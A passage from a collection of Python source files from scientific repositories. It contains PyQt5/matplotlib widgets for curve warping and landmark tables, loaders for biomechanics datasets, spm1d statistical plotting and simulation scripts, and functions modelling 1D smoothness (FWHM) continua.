curve self.h0.set_visible(False) def on_press(self, event): if self.isselectable: if event.button == 1 and self.isvisible: mx,my = event.xdata, event.ydata #mouse coordinates ind,d = self.distance2mouseclick(mx, my) if d < self.threshold: self.isselected = True self.selected.emit(self, ind, d) else: self.isselected = False def reset_domain(self): self.h.set_xdata(self.x0) self.h.set_ydata(self.y0) self.xw = self.x0.copy() self.yw = self.y0.copy() self.seqw.reset() def revert_to_previous_warp(self): self.set_warped_domain( self.xw ) # self.xw = self.x0.copy() def save_warp(self, warp): self.xw = self.x0.copy() self.yw = warp.apply_warp( self.h.get_ydata().copy() ) self.seqw.append(warp.copy()) self.h.set_xdata( self.xw ) self.h.set_ydata( self.yw ) def set_original_visible(self, visible=True): self.h0.set_visible(visible) def set_warped_domain(self, x): self.h.set_xdata(x) def set_warped_ydata(self, y): self.yw = y self.h.set_ydata(y) def toggle_original_source_visibility(self): self.h0.set_visible( not self.h0.get_visible() ) def update_warped_domain(self, xw): xw_new = self.xw + (xw - self.x0) self.set_warped_domain( xw_new ) class WarpableSource(_WarpableLine): linewidth = 0.5 zorder = 0 def calculate_mse(self, template, normalized=True): if normalized: y0 = template.get_ydata_normalized() y = self.get_ydata_normalized() else: y0 = template.h.get_ydata() y = self.h.get_ydata() return ((y-y0)**2).mean() class WarpableTemplate(_WarpableLine): iswarpable = False linewidth = 5 zorder = 2 ``` #### File: ui/figures/simple_figure.py ```python import sys,os from PyQt5 import QtWidgets, QtCore, uic from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas from matplotlib.figure import Figure from matplotlib import cm import numpy as np class SimpleFigure(FigureCanvas): def __init__(self, parent=None): self.figure = Figure(dpi=100) self.ax = self.figure.add_axes([0,0,1,1]) super().__init__(self.figure) self.setParent(parent) super().setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding) super().updateGeometry() self.setFocusPolicy( QtCore.Qt.ClickFocus ) self.setFocus() def plot(self, y): self.ax.plot( y.T ) def plot_mv(self, y): n = y.shape[2] colors = cm.jet( np.linspace(0, 1, n) ) for i,c in enumerate(colors): self.ax.plot( y[:,:,i].T, color=c, lw=0.5 ) def reset(self): self.ax.cla() self.ax.figure.canvas.draw() ``` #### File: mwarp1d/ui/panel_main.py ```python import sys,os from PyQt5 import QtWidgets, QtCore, uic import numpy as np from widgets import FileSaveDialog,MessageBox import dataio class MainPanel(QtWidgets.QWidget): def __init__(self, parent=None): super().__init__(parent=parent) fnameUI = os.path.join( os.path.dirname(__file__), 'panel_main.ui' ) uic.loadUi(fnameUI, self) self.fname = None #data file name self.fname1 = None #results file name self.mainapp = parent self.template_array = None self.sources_array = None self.stackedwidget.setCurrentIndex(0) self.groupbox_warping_mode.setEnabled(False) self.label_drop_data_files.set_filetypes( ['CSV', 'NPZ'] ) ### connect callbacks: self.button_clear.clicked.connect(self.on_button_clear) self.button_landmarks.clicked.connect(self.on_button_landmarks) self.button_manual.clicked.connect(self.on_button_manual) self.label_drop_data_files.files_dropped.connect( self.on_drop ) self.label_filename_results.clicked.connect( self.on_button_filename ) @staticmethod def _loadtxt(fname): try: y = np.loadtxt(fname, delimiter=',') except ValueError: y = np.loadtxt(fname, delimiter=',', encoding='utf-8-sig') return y def _plot(self): y0 = self.template_array y = self.sources_array ax = self.fig.ax h0 = ax.plot( y0, lw=5, color='k')[0] h1 = ax.plot( y.T, lw=1, color='0.8')[0] ax.legend([h0,h1], ['Template','Source']) ax.figure.canvas.draw() def on_button_clear(self): self.reset_panel() def on_button_filename(self): fname = None dialog = FileSaveDialog('npz') dialog.setDirectory( os.path.dirname(self.fname1) ) dialog.setAcceptMode(QtWidgets.QFileDialog.AcceptSave) s = os.path.split( self.fname1 )[-1] dialog.selectFile( s ) if dialog.exec_() == QtWidgets.QDialog.Accepted: fname = dialog.selectedFiles()[0] if fname is not None: self.fname1 = fname self.label_filename_results.setText( fname ) return fname def on_button_landmarks(self): self.mainapp.start_landmark_mode(self.template_array, self.sources_array, self.fname, self.fname1) def on_button_manual(self): self.mainapp.start_manual_mode(self.template_array, self.sources_array, self.fname, self.fname1) def on_drop(self, filenames): success = False nfiles = len(filenames) if nfiles==1: fname = filenames[0] ext = os.path.splitext(fname)[1] self.mainapp.set_default_directory( os.path.dirname(fname) ) if ext=='.csv': fname1 = self.mainapp.get_results_filename(fname) y = self._loadtxt(fname) y0,y = y[0], y[1:] self.fname = fname self.fname1 = fname1 self.template_array = y0 self.sources_array = y self._plot() self.label_nsources.setText( str(y.shape[0]) ) self.label_nnodes.setText( str(y0.size) ) self.label_filename_results.setText( fname1 ) success = True elif ext=='.npz': data = dataio.loadnpz(fname) self.start_npz(data) else: MessageBox('Error: only csv and npz') self.label_drop_data_files.set_color(0) if success: self.stackedwidget.setCurrentIndex(1) self.groupbox_warping_mode.setEnabled(True) def reset_panel(self): self.label_filename_results.setText( "" ) self.label_nsources.setText( "" ) self.label_nnodes.setText( "" ) self.groupbox_warping_mode.setEnabled(False) self.label_drop_data_files.reset_color() self.fname = None self.fname1 = None self.template_array = None self.sources_array = None self.fig.reset() self.stackedwidget.setCurrentIndex(0) def set_fname_results(self, s): self.fname1 = s self.label_filename_results.setText( s ) def start_npz(self, data): self.mainapp.start_npz(data) if __name__ == '__main__': app = QtWidgets.QApplication(sys.argv) widget = MainPanel() widget.show() sys.exit(app.exec_()) ``` #### File: ui/widgets/table_landmarks.py ```python import sys,os import numpy as np from PyQt5 import QtWidgets, QtGui, QtCore class VHeaderContextMenu(QtWidgets.QMenu): def __init__(self, parent, row): super().__init__(parent) menu = QtWidgets.QMenu(self) label = 'Unflag' if parent.rowflags[row] else 'Flag' a = QtWidgets.QAction(label, self) a.triggered.connect( lambda: parent.toggle_flag(row) ) menu.addAction(a) menu.popup( QtGui.QCursor.pos() ) class _LandmarksTable(QtWidgets.QTableWidget): def __init__(self, *args): super().__init__(*args) self.cellcolors = [QtGui.QColor(*x) for x in [(255,255,255), (200,200,200)]] self.fontcolors = [QtGui.QColor(*x) for x in [(200,200,200), (200,100,100), (50,150,50)]] def _build_table(self, update_counts=False): self.setRowCount( self.nrow ) self.setColumnCount( self.ncol ) [self.setColumnWidth(i, 50) for i in range(self.ncol)] for i in range( self.nrow ): for ii in range( self.ncol ): item = QtWidgets.QTableWidgetItem() item.setTextAlignment( QtCore.Qt.AlignCenter ) self.setItem(i, ii, item) item.setText( str(self.A[i,ii]) ) item.setFlags( QtCore.Qt.ItemIsEnabled ) if update_counts: self.panel.update_counts() def _set_row_color(self, ind, c): for i in range(self.ncol): self.item(ind,i).setBackground( c ) def delete_landmark(self, col): labels = self.get_landmark_names() labels.pop(col) self.A = np.hstack([self.A[:,:col], self.A[:,col+1:] ]) self._build_table(update_counts=True) self.setHorizontalHeaderLabels( labels ) def get_landmark_names(self): return [self.horizontalHeaderItem(c).text() for c in range(self.ncol)] def insert_landmark(self, col, x): i = col z = np.array([[x]*self.nrow], dtype=int).T labels = [self.horizontalHeaderItem(c).text() for c in range(self.ncol)] labels.insert(i, 'L') self.A = np.hstack([self.A[:,:i], z, self.A[:,i:] ]) self._build_table(update_counts=True) self.setHorizontalHeaderLabels( labels ) def rename_landmark(self, col): self.panel.rename_landmark(col) @QtCore.pyqtSlot(QtCore.QPoint) def on_vheader_rightclick(self, point): index = self.indexAt(point) row = index.row() if row >0 : menu = VHeaderContextMenu(self, row) def on_vertical_header(self, index): if index>0: for i in range(1, self.nrow): self._set_row_color(i, self.cellcolors[0]) self._set_row_color(index, self.cellcolors[1]) @property def ncol(self): return self.A.shape[1] @property def nrow(self): return self.A.shape[0] def toggle_flag(self, row): self.rowflags[row] = not self.rowflags[row] class LandmarksTableTemplate(_LandmarksTable): def _init(self, panel): self.panel = panel self.A = np.array([[25, 50, 75]]) self._build_table() self.setHorizontalHeaderLabels(['L%d'%(i+1) for i in range(self.ncol)]) self.horizontalHeader().sectionClicked.connect(self.panel.rename_landmark) self.setVerticalHeaderLabels(['___']) self.setVerticalScrollBarPolicy( QtCore.Qt.ScrollBarAlwaysOff ) self.verticalHeaderItem(0).setForeground( QtGui.QBrush( QtGui.QColor( *[240]*3 ) ) ) class LandmarksTableSources(_LandmarksTable): def _init(self, panel): self.panel = panel n = 8 self.A = np.vstack([[25]*n, [50]*n, [75]*n]).T self.rowflags = [False]*self.nrow self._build_table() self.setHorizontalHeaderLabels( panel.get_landmark_names() ) self.setVerticalHeaderLabels(['%03d'%(i+1) for i in range(self.nrow)]) self.horizontalHeader().sectionClicked.connect(self.panel.rename_landmark) vheader = self.verticalHeader() vheader.sectionClicked.connect(self.on_vertical_header) vheader.setContextMenuPolicy(QtCore.Qt.CustomContextMenu) vheader.customContextMenuRequested.connect(self.on_vheader_rightclick) ```
{ "source": "0todd0000/nlreg1d", "score": 3 }
#### File: nlreg1d/nlreg1d/data.py ```python import os,pathlib import numpy as np from matplotlib import pyplot as plt from . import dirDATA class _Dataset(object): fpath = None # path to data file def __init__(self): self.dv = None # dependent variable self.group = None # group self._load() def __repr__(self): s = f'Dataset: {self.name}\n' s += f' fpath = {self.fpath}\n' s += f' shape = {self.shape}\n' s += f' groups = {self.ug.tolist()}\n' return s def _load(self): a = np.loadtxt( self.fpath, delimiter=',') self.group = np.asarray(a[:,0], dtype=int) self.dv = a[:,1:] @property def J(self): # number of observations return self.dv.shape[0] @property def Q(self): # number of grid points return self.dv.shape[1] @property def filename(self): # dataset name return os.path.split( self.fpath )[1] @property def name(self): # dataset name return self.__class__.__name__ @property def q(self): # grid points (equally spaced over [0,1]) return np.linspace(0, 1, self.Q) @property def shape(self): # dependent variable array shape return self.dv.shape @property def ug(self): # unique group labels return np.unique(self.group) def get_dv_by_group(self): return [self.dv[self.group==u] for u in self.ug] def plot(self, ax=None, colors=('b', 'r')): ax = plt.gca() if (ax is None) else ax y0,y1 = self.get_dv_by_group() ax.plot(self.q, y0.T, color=colors[0], lw=0.3) ax.plot(self.q, y1.T, color=colors[1], lw=0.3) h0 = ax.plot(self.q, y0.mean(axis=0), color=colors[0], lw=5)[0] h1 = ax.plot(self.q, y1.mean(axis=0), color=colors[1], lw=5)[0] ax.legend([h0,h1], [f'Group {self.ug[0]} mean', f'Group {self.ug[1]} mean']) ax.set_title( self.name ) class Besier2009VastusForce(_Dataset): fpath = os.path.join( dirDATA, 'Besier2009-vastus.csv' ) class Dorn2012(_Dataset): fpath = os.path.join( dirDATA, 'Dorn2021-reduced.npz' ) def _load(self): with np.load( self.fpath, allow_pickle=True ) as z: self.group = z['speed'] self.dv = z['y'] class Pataky2014MediolateralCOP(_Dataset): fpath = os.path.join( dirDATA, 'Pataky2014-mediolateral.csv' ) class SimulatedA(_Dataset): fpath = os.path.join( dirDATA, 'SimulatedA.csv' ) class SimulatedB(_Dataset): fpath = os.path.join( dirDATA, 'SimulatedB.csv' ) ``` #### File: nlreg1d/nlreg1d/plot.py ```python import numpy as np from matplotlib import pyplot as plt from matplotlib import patches import spm1d def axes2data(ax, points): ax.get_xlim() ax.get_ylim() t = ax.transAxes + ax.transData.inverted() return t.transform( points ) def data2axes(ax, points): ax.get_xlim() ax.get_ylim() t = (ax.transAxes + ax.transData.inverted()).inverted() return t.transform( points ) def plot_multipanel(y, yr, d, n0, colors, parametric=True, ylim=None, alpha_x=None, paired=False, permutations=1000, dvlabel='Dependent variable', xlabel='Domain position (%)', group_labels=None, leg_loc=[(0.99, 0.92), (0.99, 0.92), (0.99, 0.99)]): d = d[:,1:-1] Y = np.dstack( [yr[:,1:-1],d] ) J = n0 fontname = 'Helvetica' glabels = ['Group 1 mean', 'Group 2 mean'] if (group_labels is None) else group_labels # stats: if parametric: if paired: ti = spm1d.stats.ttest_paired( y[J:], y[:J] ).inference(0.05) T2i = spm1d.stats.hotellings_paired( Y[J:], Y[:J] ).inference(0.05) tri = spm1d.stats.ttest_paired( yr[J:], yr[:J] ).inference(0.05/2) twi = spm1d.stats.ttest_paired( d[J:], d[:J] ).inference(0.05/2) else: ti = spm1d.stats.ttest2( y[J:], y[:J] ).inference(0.05) T2i = spm1d.stats.hotellings2( Y[J:], Y[:J] ).inference(0.05) tri = spm1d.stats.ttest2( yr[J:], yr[:J] ).inference(0.05/2) twi = spm1d.stats.ttest2( d[J:], d[:J] ).inference(0.05/2) else: if paired: t = spm1d.stats.nonparam.ttest_paired( y[J:], y[:J] ) T2 = spm1d.stats.nonparam.hotellings_paired( Y[J:], Y[:J] ) tr = spm1d.stats.nonparam.ttest_paired( yr[J:], yr[:J] ) tw = spm1d.stats.nonparam.ttest_paired( d[J:], d[:J] ) else: t = spm1d.stats.nonparam.ttest2( y[J:], y[:J] ) T2 = spm1d.stats.nonparam.hotellings2( Y[J:], Y[:J] ) tr = spm1d.stats.nonparam.ttest2( yr[J:], yr[:J] ) tw = spm1d.stats.nonparam.ttest2( d[J:], d[:J] ) nperm = -1 if (permutations > t.nPermUnique) else permutations ti = t.inference(0.05, iterations=nperm, two_tailed=True) T2i = T2.inference(0.05, iterations=nperm) tri = tr.inference(0.05, iterations=nperm, two_tailed=True) twi = tw.inference(0.05, iterations=nperm, two_tailed=True) # nperm0 = -1 if (permutations > t.nPermUnique) else permutations # nperm1 = -1 if (permutations > T2.nPermUnique) else permutations # nperm2 = -1 if (permutations > tr.nPermUnique) else permutations # nperm3 = -1 if (permutations > tw.nPermUnique) else permutations # create figure and axes: fig = plt.figure( figsize=(14,10) ) axw,axh = 0.26, 0.27 # axx = np.linspace( 0.06, 0.42, 0.71) axx = [0.085, 0.415, 0.730] axy = np.linspace(0.66, 0.06, 3) ax0,ax1,ax2 = [plt.axes( [x,axy[0],axw,axh] ) for x in axx] ax3 = plt.axes( [axx[0],axy[2],axw,axh] ) ax4 = plt.axes( [axx[1]+0.15,axy[1],axw,axh] ) ax5,ax6 = [plt.axes( [x,axy[2],axw,axh] ) for x in axx[1:]] AX = [ax0,ax1,ax2, ax3, ax4, ax5,ax6] h0 = ax0.plot( y[:J].T, color=colors[0], lw=0.3 )[0] h1 = ax0.plot( y[J:].T, color=colors[1], lw=0.3 )[0] h0 = ax0.plot( y[:J].mean(axis=0), color=colors[0], lw=5 )[0] h1 = ax0.plot( y[J:].mean(axis=0), color=colors[1], lw=5 )[0] leg = ax0.legend( [h0,h1], glabels, loc='upper right', bbox_to_anchor=leg_loc[0] ) plt.setp( leg.get_texts(), name=fontname) ax1.plot( yr[:J].T, color=colors[0], lw=0.3 ) ax1.plot( yr[J:].T, color=colors[1], lw=0.3 ) h0 = ax1.plot( yr[:J].mean(axis=0), color=colors[0], lw=5 )[0] h1 = ax1.plot( yr[J:].mean(axis=0), color=colors[1], lw=5 )[0] leg = ax1.legend( [h0,h1], glabels, loc='upper right', bbox_to_anchor=leg_loc[1] ) plt.setp( leg.get_texts(), name=fontname) h0 = ax2.plot( d[:J].T, color=colors[0], lw=0.3 )[0] h1 = ax2.plot( d[J:].T, color=colors[1], lw=0.3 )[0] h2 = ax2.axhline(0, color='k', ls='--') h0 = ax2.plot( d[:J].mean(axis=0), color=colors[0], lw=5 )[0] h1 = ax2.plot( d[J:].mean(axis=0), color=colors[1], lw=5 )[0] leg = ax2.legend( [h0,h1,h2], glabels + ['Null displacement'], loc='upper right', bbox_to_anchor=leg_loc[2] ) plt.setp( leg.get_texts(), name=fontname) # SPM results: ti.plot( ax=ax3 ) T2i.plot( ax=ax4 ) tri.plot( ax=ax5 ) twi.plot( ax=ax6 ) # init axes decorations: for ax in AX: plt.setp( ax.get_xticklabels() + ax.get_yticklabels(), name=fontname, size=10 ) ax.set_xlim(0, 100) ax.set_ylabel(None) [ax.set_xticklabels([]) for ax in [ax1,ax2,ax4]] # axis labels: sz = 16 ax0.set_ylabel(dvlabel, name=fontname, size=sz) ax1.set_ylabel(dvlabel, name=fontname, size=sz) ax2.set_ylabel('Warp magnitude', name=fontname, size=sz) ax3.set_ylabel('SPM{t}', name=fontname, size=sz) ax4.set_ylabel(r'SPM{ $T^2$ }', name=fontname, size=sz) ax5.set_ylabel('SPM{t}', name=fontname, size=sz) [ax.set_xlabel(xlabel, name=fontname, size=sz) for ax in [ax3,ax5,ax6]] # panel labels: labels = ['A.1', 'B.1', 'B.2', 'A.2', 'B.3', 'B.4', 'B.5'] slabels = ['Linearly registered', 'Nonlinearly registered', 'Displacement fields', 'Statistical analysis', 'Main test (amplitude + timing)', 'Post hoc (amplitude)', 'Post hoc (timing)'] [ax.text(0.03, 0.92, f'({s}) {ss}', name=fontname, size=14, transform=ax.transAxes) for ax,s,ss in zip( AX, labels, slabels ) ] tx0 = ax1.text(0.01, 1.05, 'Amplitude effects', ha='left', transform=ax1.transAxes) tx1 = ax2.text(0.99, 1.05, 'Timing effects', ha='right', transform=ax2.transAxes) plt.setp( [tx0,tx1] , name=fontname, size=16 ) # background panels: c0,c1 = '0.6', '0.9' patch0 = patches.Rectangle([0.035,0.005], 0.328, 0.99, facecolor=c0, edgecolor=c0, alpha=0.9, zorder=-1) patch1 = patches.Rectangle([0.370,0.005], 0.628, 0.99, facecolor=c1, edgecolor=c1, alpha=0.9, zorder=-1) tx0 = fig.text(0.20, 0.97, '(A) Common univariate approach', ha='center') # tx1 = fig.text(0.20, 0.48, '( No explicit temporal\neffect consideration )', ha='center') tx1 = fig.text(0.20, 0.48, '( None )', ha='center') tx2 = fig.text(0.55, 0.97, '(B) Proposed multivariate approach') fig.add_artist(patch0) fig.add_artist(patch1) plt.setp( [tx0, tx1, tx2], name=fontname, size=20) x = 0.01 y = np.array(axy) + 0.5*axh tx0 = fig.text(x, y[0], 'Dependent variables') tx1 = fig.text(x, y[1], 'Multivariate analysis') tx2 = fig.text(x, y[2], 'Univariate analysis') plt.setp( [tx0, tx1, tx2], name=fontname, size=20, rotation=90, va='center') # tx1.set_size=14 # axis limits: if ylim is not None: [ax.set_ylim(*yy) for ax,yy in zip(AX, ylim)] def add_threshold_label(ax, x0, ti): s0,s1 = r'$\alpha$ < 0.05', r'$\alpha$ > 0.05' hax = 0.02 x,y0 = data2axes( ax, [x0, ti.zstar] ) tx0 = ax.text(x, y0+hax, s0, va='bottom') tx1 = ax.text(x, y0-hax, s1, va='top') tx = [tx0,tx1] plt.setp( tx, size=11, name=fontname, transform=ax.transAxes) return tx # add threshold labels: if alpha_x is not None: add_threshold_label( ax3, alpha_x[0], ti ) add_threshold_label( ax4, alpha_x[1], T2i ) add_threshold_label( ax5, alpha_x[2], tri ) add_threshold_label( ax6, alpha_x[3], twi ) return fig,AX ``` #### File: nlreg1d/Scripts/sim_warps.py ```python import numpy as np from matplotlib import pyplot as plt from spm1d import rft1d import nlreg1d as nl def tstat(y): # one-sample t statistic return y.mean(axis=0) / y.std(ddof=1, axis=0) * (y.shape[0]**0.5) def estimate_lkc(r): ''' Estimate the Lipschitz-Killing curvature of a set of resoduals Reference: Taylor (2008) "Random fields of multivariate test statistics" ''' def _norm(a): return (a**2).sum(axis=0)**0.5 q = np.diff( r / _norm(r).T , axis=1 ) lkc = _norm( q ).sum() return lkc def sim(nsim=200, shape_parameter=0.1, n_random=25, u=np.linspace(2, 5, 21)): tmax = [] # maximum t-value fwhme = [] # estimated FWHM lkce = [] # estimate LKC for i in range(nsim): w = nl.random_warp( J, Q, sigma=3, shape_parameter=shape_parameter, n_random=n_random, as_warp_object=True ) # y = w.get_deviation_from_linear_time()[:,1:-1] y = w.get_displacement_field()[:,1:-1] r = y - y.mean(axis=0) # residuals t = tstat( y ) tmax.append( t.max() ) fwhme.append( nl.util.estimate_fwhm(r) ) lkce.append( estimate_lkc(r) ) tmax = np.array(tmax) # geometry summary: fwhmE = np.mean( fwhme ) lkcE = np.mean( lkce ) # survival functions: sf = np.array( [ (tmax>uu).mean() for uu in u] ) # simulation results sfe = rft1d.t.sf(u, v, Q, fwhmE) # expected return fwhmE, lkcE, sf,sfe # set parameters: np.random.seed(12345) J = 12 # number of observations Q = 101 # number of grid points v = J - 1 # degress of freedom nsim = 200 # number of simulated datasets (change this to 10000 to replicate the results in: ./Figures/sim-results.pdf) u = np.linspace(1, 5, 21) # thresholds for survival function calculation sps = [10, 1, 0.1, 0.01] # shape_parameter values nrs = [3, 6, 15, 50] # n_random values # run simulation: fwhms,lkcs = [],[] sfs,sfes = [],[] for sp,nr in zip(sps,nrs): results = sim(nsim, shape_parameter=sp, n_random=nr, u=u) fwhms.append( results[0] ) lkcs.append( results[1] ) sfs.append( results[2] ) sfes.append( results[3] ) # plot: plt.close('all') fig,axs = plt.subplots( 2, 2, figsize=(8,6) ) plt.get_current_fig_manager().window.move(0, 0) fontname = 'Helvetica' colors = ['r', 'g', 'b', 'k'] for ax,sf,sfe,lkc,fwhm,c in zip(axs.ravel(), sfs, sfes, lkcs, fwhms, colors): h0 = ax.plot(u, sfe, '-', color=c, label='Theoretical')[0] h1 = ax.plot(u, sf, 'o', color=c, label='Simulated')[0] ax.text(0.6, 0.98, 'LKC = %.1f\nFWHM = %.1f'%(lkc,fwhm), transform=ax.transAxes, va='top', color=c, name=fontname) ax.set_ylim(0, 0.3) ax.grid(axis='x', color='0.9') ax.grid(axis='y', color='0.9') if ax==axs[0,1]: leg = ax.legend(loc='lower left') plt.setp( leg.get_texts(), name=fontname, size=10 ) [plt.setp(ax.get_xticklabels()+ax.get_yticklabels(), name=fontname, size=8) for ax in axs.ravel()] [ax.set_xticklabels([]) for ax in axs[0]] [ax.set_yticklabels([]) for ax in axs[:,1]] [ax.set_xlabel(r'$u$', name=fontname, size=14) for ax in axs[1]] [ax.set_ylabel(r'$P(t_\max > u)$', name=fontname, size=14) for ax in axs[:,0]] [ax.text(0.03, 0.92, '(%s)'%chr(97+i), name=fontname, size=12, transform=ax.transAxes) for i,ax in enumerate(axs.ravel())] plt.tight_layout() plt.show() ```
{ "source": "0todd0000/nonuniform1d", "score": 2 }
#### File: 0todd0000/nonuniform1d/fig03_terminology2D.py ```python from math import pi import numpy as np from scipy import signal from mpl_toolkits.mplot3d import Axes3D from matplotlib import pyplot,cm import spm1d #www.spm1d.org import nonuniform1d #(in this repository) def fn_mypulse2D(x, y, F, lamx, lamy): return (float(F)/(lamx*lamy)) * (1+ np.cos(2*pi/lamx*x)) * (1+ np.cos(2*pi/lamy*y)) def gen_mypulse2D(F, lamx, lamy, dt=0.1): tx,ty = np.arange(-lamx/2, lamx/2+dt, dt), np.arange(-lamy/2, lamy/2+dt, dt) X,Y = np.meshgrid(tx,ty) Z = fn_mypulse2D(X, Y, F, lamx, lamy) return X,Y,Z #N/mm2 #(0) Isotropic 2D data: np.random.seed(0) m,n = 128,128 I = np.random.randn(m,n) lam0x,lam0y = 35,35 dt = 1.0 Z0 = gen_mypulse2D(15, lam0x, lam0y, dt)[-1] I0 = 1.2*signal.convolve2d(I, Z0, boundary='symm', mode='same') #(1) Nonisotropic 2D data: np.random.seed(2) I1 = np.random.randn(m,n) np.random.seed(1) I2 = np.random.randn(m,n) lam1x,lam1y = 80,10 lam2x,lam2y = 10,80 dt = 1.0 Z1 = gen_mypulse2D(15, lam1x, lam1y, dt)[-1] Z2 = gen_mypulse2D(15, lam2x, lam2y, dt)[-1] I1 = signal.convolve2d(I1, Z1, boundary='symm', mode='same') I2 = signal.convolve2d(I2, Z2, boundary='symm', mode='same') #(2) Plot: # pyplot.close('all') fontname = 'Times New Roman' vmin,vmax = -2, 2 ### create figure and axes: axx = [0.069,0.40] axy = np.linspace(0.71,0.07,3) axw = [0.25, 0.55] axh = [0.25, 0.3] fig = pyplot.figure(figsize=(7,7)) fig.canvas.set_window_title('Figure 3') ax1 = [pyplot.axes([axx[1],yy,axw[1],axh[1]], projection='3d') for yy in axy-0.04] ax0 = [pyplot.axes([axx[0],yy,axw[0],axh[0]]) for yy in axy] AX = np.array([ax0,ax1]).T ### set fonts and sizes: [pyplot.setp(ax.get_xticklabels()+ax.get_yticklabels(), name=fontname, size=8) for ax in AX[:,0]] [pyplot.setp(ax.get_xticklabels()+ax.get_yticklabels()+ax.get_zticklabels(), name=fontname, size=8) for ax in AX[:,1]] ### plot images: ticks = [0, 32, 64, 96, 128] ticklabels = ['0', '', '0.5', '', '1'] for ax,I in zip(AX[:,0],[I0,I1,I2]): ax.imshow(I, cmap='gray', vmin=vmin, vmax=vmax, origin='lower') ax.set_xticks(ticks) ax.set_yticks(ticks) ax.set_xticklabels(ticklabels) ax.set_yticklabels(ticklabels) ax.set_xlabel('X', name=fontname, size=14) ax.set_ylabel('Y', name=fontname, size=14) cbs = [pyplot.colorbar(cax=pyplot.axes([0.33,yy,0.025,axh[0]]), mappable=AX[0,0].images[0]) for yy in axy] [pyplot.setp(cb.ax.get_yticklabels(), name=fontname, size=8) for cb in cbs] [cb.ax.set_ylabel('DV value', name=fontname, size=14) for cb in cbs] ### plot surfaces: X = np.linspace(0, 1, m) Y = np.linspace(0, 1, n) X, Y = np.meshgrid(Y, X) ticks = [0, 0.25, 0.5, 0.75, 1] ticklabels = ['0', '', '0.5', '', '1'] for ax,I in zip(AX[:,1],[I0,I1,I2]): surf = ax.plot_surface(X, Y, I, rstride=3, cstride=3, cmap=cm.gray_r, linewidth=0.2, edgecolor='0.7', antialiased=True) pyplot.setp(ax, xticks=ticks, yticks=ticks, xticklabels=ticklabels, yticklabels=ticklabels) pyplot.setp(ax, xlim=(0,1), ylim=(0,1), zlim=(-15,15)) ax.set_xlabel('X', name=fontname, size=14) ax.set_ylabel('Y', name=fontname, size=14) ax.set_zlabel('DV value', name=fontname, size=14) ### add panel labels: labels = 'Isotropic', 'Nonisotriopic (X smoother)', 'Nonisotriopic (Y smoother)' yloc = [1.14, 1.00, 1.00] for i,(ax,label,yy) in enumerate(zip(AX[:,0], labels, yloc)): ax.text(1.32, yy, '(%s) %s' %(chr(97+i), label), name=fontname, size=14, transform=ax.transAxes, va='top', bbox=dict(color='w', alpha=0.5)) ### annotate: yloc = [0.65, 0.33] for yy in yloc: AX[0,0].annotate("", xy=(0, yy), xycoords='figure fraction', xytext=(1, yy), textcoords='figure fraction', arrowprops=dict(arrowstyle="-", color='0.7') ) pyplot.show() ``` #### File: 0todd0000/nonuniform1d/nonuniform1d.py ```python from math import sqrt,log import numpy as np from matplotlib import pyplot eps = np.finfo(np.float).eps def gaussian_kernel(sd): ''' Create a Gaussian kernel with the specified standard deviation (sd) Modified from scipy.ndimage.filters.gaussian_filter1d ''' kw = int(4.0 * sd + 0.5) #kernel width weights = [0.0] * (2 * kw + 1) weights[kw] = 1.0 sum = 1.0 sd = sd * sd # calculate the kernel: for ii in range(1, kw + 1): tmp = np.exp(-0.5 * float(ii * ii) / sd) weights[kw + ii] = tmp weights[kw - ii] = tmp sum += 2.0 * tmp for ii in range(2 * kw + 1): weights[ii] /= sum return np.array(weights) def fwhm_exponential(Q, w0, w1): ''' Exponential smoothness model Parameters: Q : number of continuum nodes w0 : initial smoothness value w1 : final smoothness value ''' x = np.linspace(-2, 2, Q) fwhm = np.exp(x) fwhm = w0 + w1 * fwhm/fwhm[-1] return fwhm def fwhm_gaussian(Q, q, sd, w0, w1): ''' Gaussian pulse smoothness model Parameters: Q : number of continuum nodes q : location of Gaussian kernel center sd : standard deviation of the kernel w0 : baseline smoothness value w1 : maximum smoothness value ''' y = np.zeros(Q) g = gaussian_kernel(sd) n = g.size i0 = q - int(n/2) i1 = q + int(n/2) + 1 if i0 < 0: n2crop = abs(i0) i0 = 0 g = g[n2crop:] if i1 > Q: n2crop = i1 - Q i1 = Q g = g[:-n2crop] y[i0:i1] = g amp = w1 - w0 fwhm = w0 + y * amp / y.max() return fwhm def fwhm_linear(Q, w0, w1, q0=None, q1=None): ''' Linear smoothness model Parameters: Q : number of continuum nodes w0 : initial smoothness value w1 : final smoothness value q0 : optional starting node for linear increase q1 : optional ending node for linear increase ''' q0 = 0 if (q0 is None) else q0 q1 = Q if (q1 is None) else q1 width = q1 - q0 wstep = np.linspace(w0, w1, width) w = w0 * np.ones(Q) w[q0:q1] = wstep w[q1:] = w1 return w def fwhm_step(Q, w0, w1): ''' Sigmoid step smoothness model Parameters: Q : number of continuum nodes w0 : initial smoothness value w1 : final smoothness value ''' dx = 5 x = np.linspace(-5, 5, Q) fwhm = w0 + (w1-w0) / (1 + np.exp(-dx*x)) return fwhm def fwhm_double_step(Q, w0, w1, w2): ''' Double sigmoid step smoothness model Parameters: Q : number of continuum nodes w0 : initial smoothness value w1 : intermediary smoothness value w2 : final smoothness value ''' dx = 5 n = int(Q/2) n0,n1 = (n+1,n) if Q%2 else (n,n) x0 = np.linspace(-5, +2.5, n0) x1 = np.linspace(-2.4, +5, n1) fwhm0 = w0 + (w1-w0) / (1 + np.exp(-dx*x0)) fwhm1 = w1 + (w2-w1) / (1 + np.exp(-dx*x1)) fwhm = np.hstack([fwhm0,fwhm1]) return fwhm def generate_fwhm_continuum(type='linear', *args): ''' Generate a 1D FWHM continuum as a model of underlying data smoothness Parameters: type : one of ["linear", "exponential", "gaussian", "step", "double step"] args : model-dependent arguments; see documentation from fwhm* functions ''' if type=='double_step': fn = fwhm_double_step if type=='linear': fn = fwhm_linear elif type=='exponential': fn = fwhm_exponential elif type=='step': fn = fwhm_step elif type=='gaussian': fn = fwhm_gaussian return fn(*args) def estimate_fwhm(R, mean=True): resels = estimate_resels(R, mean=False) fwhm = 1 / resels if mean: fwhm = fwhm.mean() return fwhm def estimate_resels(R, mean=True): ''' Estimate local continuum smoothness. NOTE: Only use this function to approximate local smoothness! Robust smoothness estimation must be done only at the continuum level, as implemented in **spm1d.rft1d.geom.estimate_fwhm*** This code is adapted from **spm1d.rft1d.geom.estimate_fwhm** ''' ssq = (R**2).sum(axis=0) ### gradient estimation (Method 2) dy,dx = np.gradient(R) v = (dx**2).sum(axis=0) # normalize: v /= (ssq + eps) # ignore zero-variance nodes: i = np.isnan(v) v = 